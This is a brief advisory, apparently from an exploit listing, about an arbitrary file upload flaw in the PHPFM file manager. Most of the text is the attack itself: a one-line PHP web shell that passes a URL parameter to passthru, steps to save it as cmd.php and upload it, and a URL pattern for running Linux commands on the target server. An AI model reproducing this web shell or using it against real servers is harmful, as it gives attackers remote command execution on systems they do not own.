|
|
PHPFM Arbitrary File Upload Vulnerability
No exploit is required. An example has been provided: the code shell :- --------------- <pre> <? passthru($_GET['cmd']); ?>> save as > cmd.php now upload in PHPFM http://www.esxample.com/[file upload name]/[files]/cmd.php?cmd=[command linux] |
|
Privacy Statement |